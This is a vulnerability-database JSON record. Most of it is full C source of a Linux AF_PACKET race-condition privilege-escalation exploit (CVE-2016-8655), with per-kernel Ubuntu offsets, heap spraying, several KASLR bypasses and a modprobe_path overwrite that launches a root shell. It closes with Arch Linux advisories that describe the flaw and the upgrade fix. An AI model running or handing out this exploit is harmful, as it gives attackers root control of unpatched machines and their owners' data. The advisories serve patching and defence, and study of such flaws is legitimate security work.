1;\r\nvolatile int vers_switcher_done = 0;\r\n\r\nstruct kernel_info {\r\n char *kernel_version;\r\n unsigned long proc_dostring;\r\n unsigned long modprobe_path;\r\n unsigned long register_sysctl_table;\r\n unsigned long set_memory_rw;\r\n};\r\n\r\nstruct kernel_info kernels[] = {\r\n { \"4.4.0-21-generic #37~14.04.1-Ubuntu\", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 },\r\n { \"4.4.0-22-generic #40~14.04.1-Ubuntu\", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 },\r\n { \"4.4.0-24-generic #43~14.04.1-Ubuntu\", 0x084120, 0xc4b080, 0x2736f0, 0x06b880 },\r\n { \"4.4.0-28-generic #47~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273b70, 0x06b880 },\r\n { \"4.4.0-31-generic #50~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c20, 0x06b880 },\r\n { \"4.4.0-34-generic #53~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c40, 0x06b880 },\r\n { \"4.4.0-36-generic #55~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c60, 0x06b890 },\r\n { \"4.4.0-38-generic #57~14.04.1-Ubuntu\", 0x084210, 0xe4b100, 0x2742e0, 0x06b890 },\r\n { \"4.4.0-42-generic #62~14.04.1-Ubuntu\", 0x084260, 0xe4b100, 0x274300, 0x06b880 },\r\n { \"4.4.0-45-generic #66~14.04.1-Ubuntu\", 0x084260, 0xe4b100, 0x274340, 0x06b880 },\r\n //{\"4.4.0-46-generic #67~14.04.1-Ubuntu\",0x0842f0,0xe4b100,0x274580,0x06b880},\r\n { \"4.4.0-47-generic #68~14.04.1-Ubuntu\", 0x0842f0, 0xe4b100, 0x274580, 0x06b880 },\r\n //{\"4.4.0-49-generic #70~14.04.1-Ubuntu\",0x084350,0xe4b100,0x274b10,0x06b880},\r\n { \"4.4.0-51-generic #72~14.04.1-Ubuntu\", 0x084350, 0xe4b100, 0x274750, 0x06b880 },\r\n\r\n { \"4.4.0-21-generic #37-Ubuntu\", 0x087cf0, 0xe48e80, 0x286310, 0x06f370 },\r\n { \"4.4.0-22-generic #40-Ubuntu\", 0x087d40, 0xe48f00, 0x2864d0, 0x06f370 },\r\n { \"4.4.0-24-generic #43-Ubuntu\", 0x087e60, 0xe48f00, 0x2868f0, 0x06f370 },\r\n { \"4.4.0-28-generic #47-Ubuntu\", 0x087ea0, 0xe48f80, 0x286df0, 0x06f370 },\r\n { \"4.4.0-31-generic #50-Ubuntu\", 0x087ea0, 0xe48f80, 0x286e90, 0x06f370 },\r\n { \"4.4.0-34-generic #53-Ubuntu\", 0x087ea0, 0xe48f80, 0x286ed0, 0x06f370 },\r\n { \"4.4.0-36-generic #55-Ubuntu\", 0x087ea0, 0xe48f80, 0x286e50, 0x06f360 },\r\n { \"4.4.0-38-generic #57-Ubuntu\", 0x087f70, 0xe48f80, 0x287470, 0x06f360 },\r\n { \"4.4.0-42-generic #62-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874a0, 0x06f320 },\r\n { \"4.4.0-43-generic #63-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874b0, 0x06f320 },\r\n { \"4.4.0-45-generic #66-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874c0, 0x06f320 },\r\n //{\"4.4.0-46-generic #67-Ubuntu\",0x088040,0xe48f80,0x287800,0x06f320},\r\n { \"4.4.0-47-generic #68-Ubuntu\", 0x088040, 0xe48f80, 0x287800, 0x06f320 },\r\n //{\"4.4.0-49-generic #70-Ubuntu\",0x088090,0xe48f80,0x287d40,0x06f320},\r\n { \"4.4.0-51-generic #72-Ubuntu\", 0x088090, 0xe48f80, 0x2879a0, 0x06f320},\r\n};\r\n\r\n#define VSYSCALL 0xffffffffff600000\r\n#define PROC_DOSTRING (KERNEL_BASE + kernels[kernel].proc_dostring)\r\n#define MODPROBE_PATH (KERNEL_BASE + kernels[kernel].modprobe_path)\r\n#define REGISTER_SYSCTL_TABLE (KERNEL_BASE + kernels[kernel].register_sysctl_table)\r\n#define SET_MEMORY_RW (KERNEL_BASE + kernels[kernel].set_memory_rw)\r\n\r\n#define KMALLOC_PAD 64\r\n\r\nint pad_fds[KMALLOC_PAD];\r\n\r\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\r\n\r\nstruct ctl_table {\r\n const char *procname;\r\n void *data;\r\n int maxlen;\r\n unsigned short mode;\r\n struct ctl_table *child;\r\n void *proc_handler;\r\n void *poll;\r\n void *extra1;\r\n void *extra2;\r\n};\r\n\r\n#define CONF_RING_FRAMES 1\r\n\r\nstruct tpacket_req3 tp;\r\nint sfd;\r\nint mapped = 0;\r\n\r\nstruct timer_list {\r\n void *next;\r\n void *prev;\r\n unsigned long expires;\r\n void (*function)(unsigned long);\r\n unsigned long data;\r\n unsigned int flags;\r\n int slack;\r\n};\r\n\r\n// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *\r\n\r\nvoid *setsockopt_thread(void *arg)\r\n{\r\n while (barrier) {}\r\n setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));\r\n\r\n return NULL;\r\n}\r\n\r\nvoid *vers_switcher(void *arg)\r\n{\r\n int val,x,y;\r\n\r\n while (barrier) {}\r\n\r\n while (1) {\r\n val = TPACKET_V1;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n y++;\r\n\r\n if (x != 0) break;\r\n\r\n val = TPACKET_V3;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n if (x != 0) break;\r\n\r\n y++;\r\n }\r\n\r\n dprintf(\"[.] version switcher stopping, x = %d (y = %d, last val = %d)\\n\",x,y,val);\r\n vers_switcher_done = 1;\r\n\r\n return NULL;\r\n}\r\n\r\n// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *\r\n\r\n#define BUFSIZE 1408\r\nchar exploitbuf[BUFSIZE];\r\n\r\nvoid kmalloc(void)\r\n{\r\n while(1)\r\n syscall(__NR_add_key, \"user\", \"wtf\", exploitbuf, BUFSIZE - 24, -2);\r\n}\r\n\r\nvoid pad_kmalloc(void)\r\n{\r\n int x;\r\n for (x = 0; x < KMALLOC_PAD; x++)\r\n if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) {\r\n dprintf(\"[-] pad_kmalloc() socket error\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n\r\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\r\n\r\nint try_exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n pthread_t setsockopt_thread_thread,a;\r\n int val;\r\n socklen_t l;\r\n struct timer_list *timer;\r\n int fd;\r\n struct tpacket_block_desc *pbd;\r\n int off;\r\n sigset_t set;\r\n\r\n sigemptyset(&set);\r\n\r\n sigaddset(&set, SIGSEGV);\r\n\r\n if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {\r\n dprintf(\"[-] couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n\r\n dprintf(\"[.] new exploit attempt starting, jumping to %p, arg=%p\\n\", (void *)func, (void *)arg);\r\n\r\n pad_kmalloc();\r\n\r\n fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\r\n\r\n if (fd == -1) {\r\n dprintf(\"[-] target socket error\\n\");\r\n exit(1);\r\n }\r\n\r\n pad_kmalloc();\r\n\r\n dprintf(\"[.] done, sockets allocated\\n\");\r\n\r\n val = TPACKET_V3;\r\n\r\n setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n tp.tp_block_size = CONF_RING_FRAMES * getpagesize();\r\n tp.tp_block_nr = 1;\r\n tp.tp_frame_size = getpagesize();\r\n tp.tp_frame_nr = CONF_RING_FRAMES;\r\n\r\n // try to set the timeout to 10 seconds\r\n // the default timeout might still be used though depending on when the race was won\r\n tp.tp_retire_blk_tov = 10000;\r\n\r\n sfd = fd;\r\n\r\n if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {\r\n dprintf(\"[-] Error creating thread\\n\");\r\n return 1;\r\n }\r\n\r\n pthread_create(&a, NULL, vers_switcher, (void *)NULL);\r\n\r\n usleep(200000);\r\n\r\n dprintf(\"[.] removing barrier and spraying...\\n\");\r\n\r\n memset(exploitbuf, '\\x00', BUFSIZE);\r\n\r\n timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);\r\n timer->next = 0;\r\n timer->prev = 0;\r\n\r\n timer->expires = 4294943360;\r\n timer->function = (void *)func;\r\n timer->data = arg;\r\n timer->flags = 1;\r\n timer->slack = -1;\r\n\r\n barrier = 0;\r\n\r\n usleep(100000);\r\n\r\n while (!vers_switcher_done) usleep(100000);\r\n\r\n l = sizeof(val);\r\n getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);\r\n\r\n dprintf(\"[.] current packet version = %d\\n\",val);\r\n\r\n pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);\r\n\r\n if (pbd == MAP_FAILED) {\r\n dprintf(\"[-] could not map pbd\\n\");\r\n exit(1);\r\n } else {\r\n off = pbd->hdr.bh1.offset_to_first_pkt;\r\n dprintf(\"[.] pbd->hdr.bh1.offset_to_first_pkt = %d\\n\", off);\r\n }\r\n\r\n\r\n if (val == TPACKET_V1 && off != 0) {\r\n dprintf(\"*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\\n\");\r\n } else {\r\n dprintf(\"[-] race not won\\n\");\r\n exit(2);\r\n }\r\n\r\n munmap(pbd, tp.tp_block_size * tp.tp_block_nr);\r\n\r\n pthread_create(&a, NULL, verification_func, (void *)NULL);\r\n\r\n dprintf(\"\\n\");\r\n dprintf(\"[!] please wait up to a few minutes for timer to be executed.\\n\");\r\n dprintf(\"[!] if you ctrl-c now the kernel will hang. so don't do that.\\n\");\r\n dprintf(\"\\n\");\r\n\r\n sleep(1);\r\n dprintf(\"[.] closing socket and verifying...\\n\");\r\n\r\n close(sfd);\r\n\r\n kmalloc();\r\n\r\n dprintf(\"[.] all messages sent\\n\");\r\n\r\n sleep(31337);\r\n exit(1);\r\n}\r\n\r\nint verification_result = 0;\r\n\r\nvoid catch_sigsegv(int sig)\r\n{\r\n verification_result = 0;\r\n pthread_exit((void *)1);\r\n}\r\n\r\nvoid *modify_vsyscall(void *arg)\r\n{\r\n unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);\r\n unsigned long x = (unsigned long)arg;\r\n\r\n sigset_t set;\r\n sigemptyset(&set);\r\n sigaddset(&set, SIGSEGV);\r\n\r\n if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {\r\n dprintf(\"[-] couldn't set sigmask\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n signal(SIGSEGV, catch_sigsegv);\r\n\r\n *vsyscall = 0xdeadbeef+x;\r\n\r\n if (*vsyscall == 0xdeadbeef+x) {\r\n dprintf(\"[~] vsyscall page altered!\\n\");\r\n verification_result = 1;\r\n pthread_exit(0);\r\n }\r\n\r\n return NULL;\r\n}\r\n\r\nvoid verify_stage1(void)\r\n{\r\n pthread_t v_thread;\r\n\r\n sleep(5);\r\n\r\n int x;\r\n for(x = 0; x < 300; x++) {\r\n\r\n pthread_create(&v_thread, NULL, modify_vsyscall, 0);\r\n\r\n pthread_join(v_thread, NULL);\r\n\r\n if(verification_result == 1) {\r\n exit(0);\r\n }\r\n\r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n\r\n dprintf(\"[-] could not modify vsyscall\\n\");\r\n exit(EXIT_FAILURE);\r\n}\r\n\r\nvoid verify_stage2(void)\r\n{\r\n struct stat b;\r\n\r\n sleep(5);\r\n\r\n int x;\r\n for(x = 0; x < 300; x++) {\r\n\r\n if (stat(SYSCTL_PATH, &b) == 0) {\r\n dprintf(\"[~] sysctl added!\\n\");\r\n exit(0);\r\n }\r\n\r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n\r\n dprintf(\"[-] could not add sysctl\\n\");\r\n exit(EXIT_FAILURE);\r\n}\r\n\r\nvoid exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n int status;\r\n int pid;\r\n\r\nretry:\r\n\r\n pid = fork();\r\n\r\n if (pid == 0) {\r\n try_exploit(func, arg, verification_func);\r\n exit(1);\r\n }\r\n\r\n wait(&status);\r\n\r\n dprintf(\"\\n\");\r\n\r\n if (WEXITSTATUS(status) == 2) {\r\n dprintf(\"[.] retrying stage...\\n\");\r\n kill(pid, 9);\r\n sleep(2);\r\n goto retry;\r\n }\r\n\r\n if (WEXITSTATUS(status) != 0) {\r\n dprintf(\"[-] something bad happened, aborting exploit attempt\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n kill(pid, 9);\r\n}\r\n\r\n\r\nvoid wrapper(void)\r\n{\r\n struct ctl_table *c;\r\n\r\n dprintf(\"[.] making vsyscall page writable...\\n\\n\");\r\n\r\n exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1);\r\n\r\n dprintf(\"[~] done, stage 1 completed\\n\");\r\n\r\n sleep(5);\r\n\r\n dprintf(\"[.] registering new sysctl...\\n\\n\");\r\n\r\n c = (struct ctl_table *)(VSYSCALL+0x850);\r\n\r\n memset((char *)(VSYSCALL+0x850), '\\x00', 1952);\r\n\r\n strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME);\r\n memcpy((char *)(VSYSCALL+0xe00), \"\\x01\\x00\\x00\\x00\",4);\r\n c->procname = (char *)(VSYSCALL+0xf00);\r\n c->mode = 0666;\r\n c->proc_handler = (void *)(PROC_DOSTRING);\r\n c->data = (void *)(MODPROBE_PATH);\r\n c->maxlen = 256;\r\n c->extra1 = (void *)(VSYSCALL+0xe00);\r\n c->extra2 = (void *)(VSYSCALL+0xd00);\r\n\r\n exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2);\r\n\r\n dprintf(\"[~] done, stage 2 completed\\n\");\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *\r\n\r\nvoid check_procs() {\r\n int min_procs = 2;\r\n\r\n int nprocs = 0;\r\n nprocs = get_nprocs_conf();\r\n\r\n if (nprocs < min_procs) {\r\n dprintf(\"[-] system has less than %d processor cores\\n\", min_procs);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n dprintf(\"[.] system has %d processor cores\\n\", nprocs);\r\n}\r\n\r\nstruct utsname get_kernel_version() {\r\n struct utsname u;\r\n int rv = uname(&u);\r\n if (rv != 0) {\r\n dprintf(\"[-] uname())\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n return u;\r\n}\r\n\r\n#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))\r\n\r\nvoid detect_versions() {\r\n struct utsname u;\r\n char kernel_version[512];\r\n\r\n u = get_kernel_version();\r\n\r\n if (strstr(u.machine, \"64\") == NULL) {\r\n dprintf(\"[-] system is not using a 64-bit kernel\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n if (strstr(u.version, \"-Ubuntu\") == NULL) {\r\n dprintf(\"[-] system is not using an Ubuntu kernel\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n char *u_ver = strtok(u.version, \" \");\r\n snprintf(kernel_version, 512, \"%s %s\", u.release, u_ver);\r\n\r\n int i;\r\n for (i = 0; i < ARRAY_SIZE(kernels); i++) {\r\n if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {\r\n dprintf(\"[.] kernel version '%s' detected\\n\", kernels[i].kernel_version);\r\n kernel = i;\r\n return;\r\n }\r\n }\r\n\r\n dprintf(\"[-] kernel version not recognized\\n\");\r\n exit(EXIT_FAILURE);\r\n}\r\n\r\n// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *\r\n\r\n#define SYSLOG_ACTION_READ_ALL 3\r\n#define SYSLOG_ACTION_SIZE_BUFFER 10\r\n\r\nbool mmap_syslog(char** buffer, int* size) {\r\n *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\r\n if (*size == -1) {\r\n dprintf(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\\n\");\r\n return false;\r\n }\r\n\r\n *size = (*size / getpagesize() + 1) * getpagesize();\r\n *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,\r\n MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n\r\n *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);\r\n if (*size == -1) {\r\n dprintf(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\\n\");\r\n return false;\r\n }\r\n\r\n return true;\r\n}\r\n\r\nunsigned long get_kernel_addr_trusty(char* buffer, int size) {\r\n const char* needle1 = \"Freeing unused\";\r\n char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n if (substr == NULL) return 0;\r\n\r\n int start = 0;\r\n int end = 0;\r\n for (end = start; substr[end] != '-'; end++);\r\n\r\n const char* needle2 = \"ffffff\";\r\n substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\r\n if (substr == NULL) return 0;\r\n\r\n char* endptr = &substr[16];\r\n unsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n r &= 0xffffffffff000000ul;\r\n\r\n return r;\r\n}\r\n\r\nunsigned long get_kernel_addr_xenial(char* buffer, int size) {\r\n const char* needle1 = \"Freeing unused\";\r\n char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n if (substr == NULL) {\r\n return 0;\r\n }\r\n\r\n int start = 0;\r\n int end = 0;\r\n for (start = 0; substr[start] != '-'; start++);\r\n for (end = start; substr[end] != '\\n'; end++);\r\n\r\n const char* needle2 = \"ffffff\";\r\n substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\r\n if (substr == NULL) {\r\n return 0;\r\n }\r\n\r\n char* endptr = &substr[16];\r\n unsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n r &= 0xfffffffffff00000ul;\r\n r -= 0x1000000ul;\r\n\r\n return r;\r\n}\r\n\r\nunsigned long get_kernel_addr_syslog() {\r\n unsigned long addr = 0;\r\n char* syslog;\r\n int size;\r\n\r\n dprintf(\"[.] trying syslog...\\n\");\r\n\r\n if (!mmap_syslog(&syslog, &size))\r\n return 0;\r\n\r\n if (strstr(kernels[kernel].kernel_version, \"14.04.1\") != NULL)\r\n addr = get_kernel_addr_trusty(syslog, size);\r\n else\r\n addr = get_kernel_addr_xenial(syslog, size);\r\n\r\n if (!addr)\r\n dprintf(\"[-] kernel base not found in syslog\\n\");\r\n\r\n return addr;\r\n}\r\n\r\n// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_kallsyms() {\r\n FILE *f;\r\n unsigned long addr = 0;\r\n char dummy;\r\n char sname[256];\r\n char* name = \"startup_64\";\r\n char* path = \"/proc/kallsyms\";\r\n\r\n dprintf(\"[.] trying %s...\\n\", path);\r\n f = fopen(path, \"r\");\r\n if (f == NULL) {\r\n dprintf(\"[-] open/read(%s)\\n\", path);\r\n return 0;\r\n }\r\n\r\n int ret = 0;\r\n while (ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n\r\n fclose(f);\r\n dprintf(\"[-] kernel base not found in %s\\n\", path);\r\n return 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_sysmap() {\r\n FILE *f;\r\n unsigned long addr = 0;\r\n char path[512] = \"/boot/System.map-\";\r\n char version[32];\r\n\r\n struct utsname u;\r\n u = get_kernel_version();\r\n strcat(path, u.release);\r\n dprintf(\"[.] trying %s...\\n\", path);\r\n f = fopen(path, \"r\");\r\n if (f == NULL) {\r\n dprintf(\"[-] open/read(%s)\\n\", path);\r\n return 0;\r\n }\r\n\r\n char dummy;\r\n char sname[256];\r\n char* name = \"startup_64\";\r\n int ret = 0;\r\n while (ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n\r\n fclose(f);\r\n dprintf(\"[-] kernel base not found in %s\\n\", path);\r\n return 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_mincore() {\r\n unsigned char buf[getpagesize()/sizeof(unsigned char)];\r\n unsigned long iterations = 20000000;\r\n unsigned long addr = 0;\r\n\r\n dprintf(\"[.] trying mincore info leak...\\n\");\r\n /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */\r\n if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,\r\n MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {\r\n dprintf(\"[-] mmap()\\n\");\r\n return 0;\r\n }\r\n\r\n int i;\r\n for (i = 0; i <= iterations; i++) {\r\n /* Touch a mishandle with this type mapping */\r\n if (mincore((void*)0x86000000, 0x1000000, buf)) {\r\n dprintf(\"[-] mincore()\\n\");\r\n return 0;\r\n }\r\n\r\n int n;\r\n for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {\r\n addr = *(unsigned long*)(&buf[n]);\r\n /* Kernel address space */\r\n if (addr > 0xffffffff00000000) {\r\n addr &= 0xffffffffff000000ul;\r\n if (munmap((void*)0x66000000, 0x20000000000))\r\n dprintf(\"[-] munmap()\\n\");\r\n return addr;\r\n }\r\n }\r\n }\r\n\r\n if (munmap((void*)0x66000000, 0x20000000000))\r\n dprintf(\"[-] munmap()\\n\");\r\n\r\n dprintf(\"[-] kernel base not found in mincore info leak\\n\");\r\n return 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr() {\r\n unsigned long addr = 0;\r\n\r\n addr = get_kernel_addr_kallsyms();\r\n if (addr) return addr;\r\n\r\n addr = get_kernel_addr_sysmap();\r\n if (addr) return addr;\r\n\r\n addr = get_kernel_addr_syslog();\r\n if (addr) return addr;\r\n\r\n addr = get_kernel_addr_mincore();\r\n if (addr) return addr;\r\n\r\n dprintf(\"[-] KASLR bypass failed\\n\");\r\n exit(EXIT_FAILURE);\r\n\r\n return 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\r\n\r\nvoid launch_rootshell(void)\r\n{\r\n int fd;\r\n char buf[256];\r\n struct stat s;\r\n\r\n fd = open(SYSCTL_PATH, O_WRONLY);\r\n\r\n if(fd == -1) {\r\n dprintf(\"[-] could not open %s\\n\", SYSCTL_PATH);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n memset(buf, '\\x00', 256);\r\n\r\n readlink(\"/proc/self/exe\", (char *)&buf, 256);\r\n\r\n write(fd, buf, strlen(buf)+1);\r\n\r\n socket(AF_INET, SOCK_STREAM, 132);\r\n\r\n if (stat(buf,&s) == 0 && s.st_uid == 0) {\r\n dprintf(\"[+] binary executed by kernel, launching rootshell\\n\");\r\n lseek(fd, 0, SEEK_SET);\r\n write(fd, \"/sbin/modprobe\", 15);\r\n close(fd);\r\n execl(buf, buf, NULL);\r\n } else {\r\n dprintf(\"[-] could not create rootshell\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n\r\nvoid setup_sandbox() {\r\n if (unshare(CLONE_NEWUSER) != 0) {\r\n dprintf(\"[-] unshare(CLONE_NEWUSER)\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n if (unshare(CLONE_NEWNET) != 0) {\r\n dprintf(\"[-] unshare(CLONE_NEWNET)\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n int status, pid;\r\n struct utsname u;\r\n char buf[512], *f;\r\n\r\n if (getuid() == 0 && geteuid() == 0) {\r\n chown(\"/proc/self/exe\", 0, 0);\r\n chmod(\"/proc/self/exe\", 06755);\r\n exit(0);\r\n }\r\n\r\n if (getuid() != 0 && geteuid() == 0) {\r\n setresuid(0, 0, 0);\r\n setresgid(0, 0, 0);\r\n execl(\"/bin/bash\", \"bash\", \"-p\", NULL);\r\n exit(0);\r\n }\r\n\r\n dprintf(\"linux AF_PACKET race condition exploit by rebel\\n\");\r\n\r\n dprintf(\"[.] starting\\n\");\r\n\r\n dprintf(\"[.] checking hardware\\n\");\r\n check_procs();\r\n dprintf(\"[~] done, hardware looks good\\n\");\r\n\r\n dprintf(\"[.] checking kernel version\\n\");\r\n detect_versions();\r\n dprintf(\"[~] done, version looks good\\n\");\r\n\r\n#if ENABLE_KASLR_BYPASS\r\n dprintf(\"[.] KASLR bypass enabled, getting kernel base address\\n\");\r\n KERNEL_BASE = get_kernel_addr();\r\n dprintf(\"[~] done, kernel text: %lx\\n\", KERNEL_BASE);\r\n#endif\r\n\r\n dprintf(\"[.] proc_dostring: %lx\\n\", PROC_DOSTRING);\r\n dprintf(\"[.] modprobe_path: %lx\\n\", MODPROBE_PATH);\r\n dprintf(\"[.] register_sysctl_table: %lx\\n\", REGISTER_SYSCTL_TABLE);\r\n dprintf(\"[.] set_memory_rw: %lx\\n\", SET_MEMORY_RW);\r\n\r\n pid = fork();\r\n if (pid == 0) {\r\n dprintf(\"[.] setting up namespace sandbox\\n\");\r\n setup_sandbox();\r\n dprintf(\"[~] done, namespace sandbox set up\\n\");\r\n wrapper();\r\n exit(0);\r\n }\r\n\r\n waitpid(pid, &status, 0);\r\n\r\n launch_rootshell();\r\n return 0;\r\n}\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33037"}], "archlinux": [{"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Arch Linux Security Advisory ASA-201612-8\n=========================================\n\nSeverity: High\nDate : 2016-12-07\nCVE-ID : CVE-2016-8655\nPackage : linux-zen\nType : privilege escalation\nRemote : No\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package linux-zen before version 4.8.12-2 is vulnerable to\nprivilege escalation.\n\nResolution\n==========\n\nUpgrade to 4.8.12-2.\n\n# pacman -Syu \"linux-zen>=4.8.12-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system.\n\nImpact\n======\n\nA local attacker with CAP_NET_RAW capabilities is able to crash the\nsystem or run arbitrary code with administrative privileges.\n\nReferences\n==========\n\nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c\nhttp://seclists.org/oss-sec/2016/q4/607\nhttps://access.redhat.com/security/cve/CVE-2016-8655", "modified": "2016-12-07T00:00:00", "published": "2016-12-07T00:00:00", "id": "ASA-201612-8", "href": "https://security.archlinux.org/ASA-201612-8", "type": "archlinux", "title": "[ASA-201612-8] linux-zen: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Arch Linux Security Advisory ASA-201612-6\n=========================================\n\nSeverity: High\nDate : 2016-12-06\nCVE-ID : CVE-2016-8655\nPackage : linux\nType : privilege escalation\nRemote : No\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package linux before version 4.8.12-2 is vulnerable to privilege\nescalation.\n\nResolution\n==========\n\nUpgrade to 4.8.12-2.\n\n# pacman -Syu \"linux>=4.8.12-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nPhilip Pettersson discovered a race condition in the af_packet\nimplementation in the Linux kernel. A local unprivileged attacker could\nuse this to cause a denial of service (system crash) or run arbitrary\ncode with administrative privileges.\n\nImpact\n======\n\nA local unprivileged attacker is able to crash the system or run\narbitrary code with administrative privileges.\n\nReferences\n==========\n\nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c\nhttp://seclists.org/oss-sec/2016/q4/607\nhttps://access.redhat.com/security/cve/CVE-2016-8655", "modified": "2016-12-06T00:00:00", "published": "2016-12-06T00:00:00", "id": "ASA-201612-6", "href": "https://security.archlinux.org/ASA-201612-6", "type": "archlinux", "title": "[ASA-201612-6] linux: privilege escalation", "cvss": {"score": 7.2, "vector": 